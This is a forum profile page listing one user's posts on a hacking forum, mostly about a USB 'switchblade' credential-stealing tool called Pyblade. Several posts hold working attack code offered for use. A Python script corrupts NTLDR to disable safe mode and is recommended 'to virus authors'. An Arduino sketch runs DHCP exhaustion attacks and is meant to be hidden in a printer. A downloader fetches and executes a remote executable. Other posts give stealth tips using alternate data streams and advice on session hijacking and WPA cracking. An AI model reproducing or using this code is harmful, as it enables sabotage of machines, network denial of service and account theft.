Jump to content

sablefoxx

Dedicated Members
  • Posts

    572
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by sablefoxx

  1. @ibegreengoblin -- I sent you a PM, I'd also recommend modifying your post here to be a little less incriminating.
  2. sablefoxx

    Pyblade

    Glad to see the project is moving forward. May I humbly suggest adding this little script I wrote recently. Allows you to copy other people's dropbox accounts and maintain access to them even if they change their password. Perfect for flash drives/switchblades! http://ge.tt/8nETsM5?c And if you're feeling a bit evil, disable safe mode (XP/2k3): # Python 2.x Code import os import mmap def patchNtldr(ntldr = 'C:\\ntldr'): file = open(ntldr, 'r+') size = os.path.getsize(ntldr) map = mmap.mmap(file.fileno(), size) map.seek(1915) # Jump to offset map.write_byte('\x90') # NOP Sled, whee! map.write_byte('\x90') map.write_byte('\x90') map.close() if __name__ == '__main__': patchNtldr()
  3. Meterpreter is good at this. -- http://lmgtfy.com/?q=meterpreter+tutorial
  4. Yeah that doesn't seem like a very mean virus. You can prbly just boot into safe mode and modify the Group Policies or regkeys to re-gain access. On a side note to virus authors don't forget to disable safe mode by patching the NTLDR like so: # Python 2.x Code import os import mmap def patchNtldr(ntldr = 'C:\\ntldr'): file = open(ntldr, 'r+') size = os.path.getsize(ntldr) map = mmap.mmap(file.fileno(), size) map.seek(1915) # Jump to offset map.write_byte('\x90') # NOP Sled, whee! map.write_byte('\x90') map.write_byte('\x90') map.close() if __name__ == '__main__': patchNtldr()
  5. DHCP attacks are fun, I recently wrote a Arduino sketch to preform DHCP Exhaustion attacks on (ethernet) networks. Thinking about hiding in a network printer or something. /*** * Net~nade: The hand held DHCP grenade (exhaustion attack) * Written by: Sablefoxx */ #include <Ethernet.h> #include <EthernetDHCP.h> /* Function Prototypes */ void requestIp(byte); void displayMac(byte); const char* addressToString(const uint8_t* ip); /* Setup */ void setup() { Serial.begin(9600); } /* Main Loop */ void loop() { byte mac[6] = {0xDE, 0xAD, 0xBE, 0xEF, 0x01, 0x01}; for(int hexFour = 0; hexFour < 256; ++hexFour) { for(int hexFive = 0; hexFive < 256; ++hexFive) { requestIp(mac); mac[5]++; hexFive++; EthernetDHCP.maintain(); } mac[4]++; // Incriment 4th hex value mac[5] = 0x01; // Reset 5th hex value hexFour++; // Incriment count } } void requestIp(byte mac[]) { Serial.print("[*] Attempting to obtain DHCP lease..."); EthernetDHCP.begin(mac); const byte* ip = EthernetDHCP.ipAddress(); const byte* gateway = EthernetDHCP.gatewayIpAddress(); Serial.println("got it!"); Serial.print("[+] From "); Serial.print(addressToString(gateway)); Serial.print(" got "); Serial.print(addressToString(ip)); Serial.print(" with "); displayMac(mac); Serial.print("\n"); } void displayMac(byte mac[]) { for(int index; index <= 5; ++index) { Serial.print(mac[index], HEX); if(index < 5) { Serial.print(":"); } } } const char* addressToString(const uint8_t* ip) { static char buf[16]; sprintf(buf, "%d.%d.%d.%d\0", ip[0], ip[1], ip[2], ip[3]); return buf; }
  6. You shouldn't make system calls if possible (they're evil), it's actually easy to download files in pure python. Heres a quick example; import urllib from subprocess import Popen path = 'C:\\file.exe' # Local path url = 'http://remote-server.com/file.exe' # Remote path connection = urllib.urlopen(url) remoteFile = connection.read() connection.close() try: localFile = open(path, 'w') localFile.write(remoteFile) localFile.close() Popen(path) # Execute whatever "path" points to except IOError: print '***** OMFG ERROR: Location is not writable %s *****\n' % path Using sys.argv you can even make the 'url' a command line argument.
  7. sablefoxx

    Pyblade

    I haven't had much time to develop Py~Blade recently so here is the current source code, it's got a few bugs but feel free to hack it up. This isn't an official release but feel free to post patches, or any cool modifications you guys make. I'll get around to writing some more stuff in the summer (hopefully). (Go forth and learn python! http://docs.python.org) http://dl.dropbox.com/u/341940/pyblade.tar.gz
  8. http://www.instructables.com/id/Remove-U3-from-flash-drive/
  9. sablefoxx

    Firesheep

    Note: a lot of the time even when the credentials are sent over HTTPS the cookie is still sent in clear text, so you can still use session hijacking. This is why this type of attack is effective, even if you can't get the user/password you can still gain access to an account.
  10. sablefoxx

    Firesheep

    If you could write an exploit to do this you'd already have code running on the machine, which would make it pointless to disable HTTPS because you already owned the box, just hook the encryption dll.
  11. sablefoxx

    Firesheep

    1. Facebook sends the cookie in clear-text even if you login via SSL. 2. Gmail is now only done over SSL, no custom settings required, which mitigates this attack somewhat (certain other Google apps are not done over SSL though), but you can just use SSLStrip get around that Also look into using Hamster/Ferret it can attack all sites and not just a predefined list (and almost as easy to use)
  12. sablefoxx

    Pyblade

    I'm hoping not to have to use AV-Kill and instead just hide everything. Killing process is messy and loud and I'd rather focus on stealth. I'm currently looking into hiding executable files in alternate data streams. For those of you who aren't familiar with alternate data streams they work like so; E:\>touch test.txt E:\>echo hello world >> test.txt E:\>cat test.txt hello world E:\>dir test.txt Volume in drive E is RAID_ARRAY Volume Serial Number is 0000-0000 Directory of E:\ 10/20/2010 10:35 AM 14 test.txt 1 File(s) 14 bytes 0 Dir(s) 7,143,783,653,376 bytes free E:\>touch test.txt:hidden.txt E:\>echo this is the hidden file >> test.txt:hidden.txt E:\>dir test.txt Volume in drive E is RAID_ARRAY Volume Serial Number is 0000-0000 Directory of E:\ 10/20/2010 10:36 AM 14 test.txt 1 File(s) 14 bytes 0 Dir(s) 7,143,783,653,376 bytes free E:\>cat test.txt hello world E:\>cat test.txt:hidden.txt this is the hidden file E:\> Notice the file size does not change and the file isn't listed using 'dir' and cannot be viewed by enabling hidden/system file viewing. :)
  13. sablefoxx

    Pyblade

    (Sorry about the long update interval recently moved 1,784 miles to attend college) Lots of new features in the upcoming build, plus made the code a lot more modular so it will be easier for kids to play with. No AV kill in the new build at this time, but I will look into the Metasploit kill scripts, thx for the tip.
  14. sablefoxx

    Payloads

    None that I am aware of, I've posted the source for all of my payloads but others do not. Contacting the author of the payload is your best bet to getting a copy of the source code, if it is not publicly available.
  15. http://www.wpacracker.com/ (supports .zip files)
  16. The website works by using a very large CPU cluster (400 to be exact) to run dictionary attacks against the WPA handshake. Since he is not using rainbow tables (a.k.a. hash tables/time memory trade-off) the salted keys aren't a problem.
  17. WPA keys are salted based on the SSID of the access point. All of these tables are based on common SSIDs, so if you have a target in mind you may save a lot of time using; http://www.wpacracker.com/ (which will work on any SSID) If the access point does have a common SSID you'll want to make sure its included with the tables you download.
  18. Firefox (or any web browser for that matter)
  19. sablefoxx

    Pyblade

    A modified U3 payload is on the way, w1ldf1re is help'in with that.
  20. sablefoxx

    Pyblade

    Fixed in version 0.3 ;) -- also note its now just 'text' 'html' or 'xml' instead of 'stext', 'shtml' or 'sxml'
  21. sablefoxx

    Pyblade

    Make sure you also copy the PyBlade files onto the flash partition of the drive. 'FBex' merely finds bex.exe and executes it. You can also set FBex to start automatically when the drive is inserted via the U3 menu. I'm writing up some full documentation it'll be out soon, also w1ldf1re is working on a (modified) U3 version.
  22. sablefoxx

    Pyblade

    Ohh, okay. Yeah sounds like pwdump failed to launch for some reason... hrm.
  23. sablefoxx

    Pyblade

    Each time you run bex.exe it should create a new directory called X:\logs\COMPUTERNAME and will generate a set of logs for that computer. If a new directory does not exist there was a problem executing the payload(s). (if you're looking in X:\logs\VM then you're looking at the log files from the virtual machine I test stuff on which doesn't have any passwords nor programs installed on it) (in the examples above 'x:' would be your flash drive)
×
×
  • Create New...